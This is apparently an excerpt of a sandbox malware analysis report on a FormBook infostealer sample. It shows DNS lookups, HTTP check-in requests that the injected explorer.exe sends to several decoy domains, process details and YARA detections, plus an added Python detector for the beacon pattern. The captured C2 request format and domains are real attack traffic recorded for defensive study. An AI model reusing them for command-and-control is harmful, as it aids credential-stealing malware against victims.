| Jun 16, 2021 11:56:35.048515081 CEST | 8.8.8.8 | 192.168.2.5 | 0xcf90 | No error (0) | www.slingshotart.com | slingshotart.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:56:35.048515081 CEST | 8.8.8.8 | 192.168.2.5 | 0xcf90 | No error (0) | slingshotart.com | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:40.334650040 CEST | 8.8.8.8 | 192.168.2.5 | 0x2a42 | No error (0) | www.venturivasiljevic.com | | 154.216.127.214 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:46.120248079 CEST | 8.8.8.8 | 192.168.2.5 | 0xaba1 | No error (0) | www.helpushelpothersstore.com | s.multiscreensite.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:56:46.120248079 CEST | 8.8.8.8 | 192.168.2.5 | 0xaba1 | No error (0) | s.multiscreensite.com | | 100.24.208.97 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:46.120248079 CEST | 8.8.8.8 | 192.168.2.5 | 0xaba1 | No error (0) | s.multiscreensite.com | | 35.172.94.1 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:51.648000956 CEST | 8.8.8.8 | 192.168.2.5 | 0x11e1 | No error (0) | www.vicdux.life | pixie.porkbun.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:56:51.648000956 CEST | 8.8.8.8 | 192.168.2.5 | 0x11e1 | No error (0) | pixie.porkbun.com | | 44.227.65.245 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:51.648000956 CEST | 8.8.8.8 | 192.168.2.5 | 0x11e1 | No error (0) | pixie.porkbun.com | | 44.227.76.166 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:57.677643061 CEST | 8.8.8.8 | 192.168.2.5 | 0xc140 | No error (0) | www.lippocaritahotel.com | lippocaritahotel.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:56:57.677643061 CEST | 8.8.8.8 | 192.168.2.5 | 0xc140 | No error (0) | lippocaritahotel.com | | 103.28.148.178 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:03.516789913 CEST | 8.8.8.8 | 192.168.2.5 | 0xb8c | Name error (3) | www.saddletaxweigh.info | none | none | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:08.598931074 CEST | 8.8.8.8 | 192.168.2.5 | 0xbad9 | No error (0) | www.sitedesing.com | | 172.67.193.107 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:08.598931074 CEST | 8.8.8.8 | 192.168.2.5 | 0xbad9 | No error (0) | www.sitedesing.com | | 104.21.65.220 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:18.857973099 CEST | 8.8.8.8 | 192.168.2.5 | 0xaae6 | No error (0) | www.themiamadison.com | themiamadison.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:57:18.857973099 CEST | 8.8.8.8 | 192.168.2.5 | 0xaae6 | No error (0) | themiamadison.com | | 192.0.78.24 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:18.857973099 CEST | 8.8.8.8 | 192.168.2.5 | 0xaae6 | No error (0) | themiamadison.com | | 192.0.78.25 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:24.191294909 CEST | 8.8.8.8 | 192.168.2.5 | 0xb48c | Name error (3) | www.yorkshirebridalmakeup.info | none | none | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:29.276146889 CEST | 8.8.8.8 | 192.168.2.5 | 0x7eba | No error (0) | www.influenced-brands.com | influenced-brands.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:57:29.276146889 CEST | 8.8.8.8 | 192.168.2.5 | 0x7eba | No error (0) | influenced-brands.com | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:34.539542913 CEST | 8.8.8.8 | 192.168.2.5 | 0x78af | No error (0) | www.angrybird23blog.com | | 104.252.53.222 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:40.319406033 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b2b | Name error (3) | www.therios.net | none | none | A (IP address) | IN (0x0001) |

HTTP Request Dependency Graph

• www.jiltedowl.com
• www.slingshotart.com
• www.venturivasiljevic.com
• www.helpushelpothersstore.com
• www.vicdux.life
• www.lippocaritahotel.com
• www.sitedesing.com
• www.themiamadison.com
• www.influenced-brands.com

HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49724 | 34.102.136.180 | 80 | C:\Windows\explorer.exe |

Jun 16, 2021 11:56:24.730427027 CEST | 1351 kBytes transferred | OUT
GET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg HTTP/1.1
Host: www.jiltedowl.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Jun 16, 2021 11:56:24.869313002 CEST | 1351 kBytes transferred | IN
HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 16 Jun 2021 09:56:24 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c7be47-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49725 | 34.102.136.180 | 80 | C:\Windows\explorer.exe |

Jun 16, 2021 11:56:35.094669104 CEST | 1352 kBytes transferred | OUT
GET /um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg HTTP/1.1
Host: www.slingshotart.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Jun 16, 2021 11:56:35.233381033 CEST | 1353 kBytes transferred | IN
HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 16 Jun 2021 09:56:35 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c7be47-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49726 | 154.216.127.214 | 80 | C:\Windows\explorer.exe |

Jun 16, 2021 11:56:40.636791945 CEST | 1354 kBytes transferred | OUT
GET /um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg HTTP/1.1
Host: www.venturivasiljevic.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49727 | 100.24.208.97 | 80 | C:\Windows\explorer.exe |

Jun 16, 2021 11:56:46.288027048 CEST | 1355 kBytes transferred | OUT
GET /um8e/?4h=Xi9PH5iXPg7OqoK0h1gN6IvgnIc5gotQ/5tv039xv1j+fqecGtXMWbrdMdu22zA2SdJt&z6AhC6=4h0836-hg HTTP/1.1
Host: www.helpushelpothersstore.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Jun 16, 2021 11:56:46.451286077 CEST | 1355 kBytes transferred | IN
HTTP/1.1 403 Forbidden
Server: nginx
Date: Wed, 16 Jun 2021 09:56:46 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49728 | 44.227.65.245 | 80 | C:\Windows\explorer.exe |

Jun 16, 2021 11:56:52.072431087 CEST | 1356 kBytes transferred | OUT
GET /um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg HTTP/1.1
Host: www.vicdux.life
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Jun 16, 2021 11:56:52.284991026 CEST | 1356 kBytes transferred | IN
HTTP/1.1 307 Temporary Redirect
Server: openresty
Date: Wed, 16 Jun 2021 09:56:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 168
Connection: close
Location: http://vicdux.life
X-Frame-Options: sameorigin
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49730 | 103.28.148.178 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 16, 2021 11:56:57.887948036 CEST | 1374 | OUT | GET /um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.lippocaritahotel.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 16, 2021 11:56:58.096405029 CEST | 1374 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.21.0
                                                                                                                        Date: Wed, 16 Jun 2021 09:56:58 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Content-Length: 315
                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49737 | 172.67.193.107 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 16, 2021 11:57:08.644377947 CEST | 5377 | OUT | GET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.sitedesing.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 16, 2021 11:57:08.744154930 CEST | 5379 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:08 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Tue, 22 Sep 2020 00:47:24 GMT
                                                                                                                        x-amz-version-id: null
                                                                                                                        X-Cache: Error from cloudfront
                                                                                                                        Via: 1.1 fb8c0300277bd0137c1693d3d64ab550.cloudfront.net (CloudFront)
                                                                                                                        X-Amz-Cf-Pop: FRA50-C1
                                                                                                                        X-Amz-Cf-Id: y9aojRlOqPw51h2tNIfa6ozwR6F_DTB1fNB2CWsR6HITn9EpjEkrwQ==
                                                                                                                        Age: 18063
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        cf-request-id: 0ab5d9e3c70000d711e2127000000001
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tRq780vLZfpBHc1FT%2FJtQ8HMtc4gG5nzmFAyFtMd1eu3K3El1%2BYfYRZrCVsQk4e2CIyFaIoWsPI8bjSweqTWMkZuf4wkU%2Br1vZP9YTUWSw%2BUsD7ige3QsLJvh%2BRjAnU9"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 66032c193c94d711-FRA
                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                        Data Raw: 31 63 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 69 74 65 64 65 73 69 6e 67 2e 63 6f 6d 2f 34 30 34 2f 22 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 69 74 65 64 65 73 69 6e 67 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 41 73 73 65 74 20 31 35 35 37 40 33 78 2e 70 6e 67 22 3e 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 27 6f 67 3a 74 69 74 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 48 75 6d 61 6e 69 74 61 61 72 69 73 65 6e 20 61 76 75 6e 20 6d 61 61 69 6c 6d 61 61 6e 20 73 75 6b 65 6c 74 61 76 61 20 62 6c 6f 67 69 22 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e
                                                                                                                        Data Ascii: 1c66<!DOCTYPE html><html lang="en"> <head> <meta property="og:url" content="http://sitedesing.com/404/"> <meta property="og:image" content="http://sitedesing.com/images/Asset 1557@3x.png"><meta property='og:title' content="404 Page not found - Humanitaarisen avun maailmaan sukeltava blogi"><meta property="og:type" content="article"> <link rel="canon


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49738 | 192.0.78.24 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 16, 2021 11:57:18.902817965 CEST | 5387 | OUT | GET /um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.themiamadison.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 16, 2021 11:57:18.944828033 CEST | 5388 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 162
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg
                                                                                                                        X-ac: 2.hhn _dca
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49739 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 16, 2021 11:57:29.320394993 CEST | 5389 | OUT | GET /um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg HTTP/1.1
                                                                                                                        Host: www.influenced-brands.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 16, 2021 11:57:29.460119009 CEST | 5389 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 16 Jun 2021 09:57:29 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be47-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
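
The sessions above all carry the same request shape from explorer.exe to a different host each time: a short one-directory path (/um8e/), one long opaque parameter, and one short parameter (z6AhC6=4h0836-hg) that never changes. The following Python is an added example, not part of the sandbox report, showing how a detection would key on that shape and then correlate it across hosts so that the rotation through decoy domains becomes the signal. The sample requests are the four request lines captured above plus two benign requests constructed for contrast; the regexes, the three-host threshold and the benign traffic are my own assumptions, not a published FormBook signature.

```python
"""Heuristic detector for the check-in pattern recorded in the HTTP sessions above.

Added example, not part of the sandbox report. The shape features come from the
captured requests; the regexes and the cluster threshold are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: (process, Host header, request target). The first four rows are
# the requests captured on this page; the last two are benign requests added for contrast.
SAMPLE_REQUESTS = [
    (r"C:\Windows\explorer.exe", "www.lippocaritahotel.com",
     "/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg"),
    (r"C:\Windows\explorer.exe", "www.sitedesing.com",
     "/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg"),
    (r"C:\Windows\explorer.exe", "www.themiamadison.com",
     "/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg"),
    (r"C:\Windows\explorer.exe", "www.influenced-brands.com",
     "/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg"),
    # Benign traffic (constructed): a site search and a short cache-busting asset fetch.
    (r"C:\Program Files\Browser\browser.exe", "www.example.com", "/search?q=chkdsk&page=2"),
    (r"C:\Program Files\Browser\browser.exe", "cdn.example.com", "/a1b2/?v=20210616&cache=no"),
]

PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,6}/$")        # one short directory, e.g. /um8e/
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")    # long opaque base64-looking payload
STATIC_RE = re.compile(r"^[A-Za-z0-9-]{4,16}$")       # short token repeated across hosts


def split_query(query):
    """Split a query string WITHOUT decoding: '+' and '/' inside the payload must survive,
    which urllib.parse.parse_qsl would not preserve."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify(host, target):
    """Return the shape features of a request if it matches the check-in pattern, else None."""
    parts = urlsplit(target)
    if not PATH_RE.match(parts.path):
        return None
    params = split_query(parts.query)
    if len(params) != 2:
        return None
    (_, payload), (static_key, static_val) = params
    if not (B64_RE.match(payload) and STATIC_RE.match(static_val)):
        return None
    return {"host": host, "path": parts.path, "static": f"{static_key}={static_val}"}


def find_beacon_clusters(requests, min_hosts=3):
    """Group matching requests by (process, path, static parameter). One process sending the
    same path and static token to several unrelated hosts is the decoy-domain rotation
    visible in the sessions above; a single matching request on its own is not reported."""
    hosts_by_key = defaultdict(set)
    for process, host, target in requests:
        hit = classify(host, target)
        if hit is not None:
            hosts_by_key[(process, hit["path"], hit["static"])].add(host)
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for (process, path, static), hosts in find_beacon_clusters(SAMPLE_REQUESTS).items():
        print(f"{process}: {path} with {static} across {len(hosts)} hosts: {', '.join(hosts)}")
```

Run it against an HTTP proxy or Zeek http.log export in the same (process, host, target) form; the per-request shape test on its own is deliberately loose, and the cluster step is what keeps a single odd-looking URL from paging anyone.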


                                                                                                                        Behavior

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:11:55:27
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:222795 bytes
                                                                                                                        MD5 hash:D3D5E6CAFA8CA89384E56E6374A14203
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:11:55:27
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:222795 bytes
                                                                                                                        MD5 hash:D3D5E6CAFA8CA89384E56E6374A14203
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
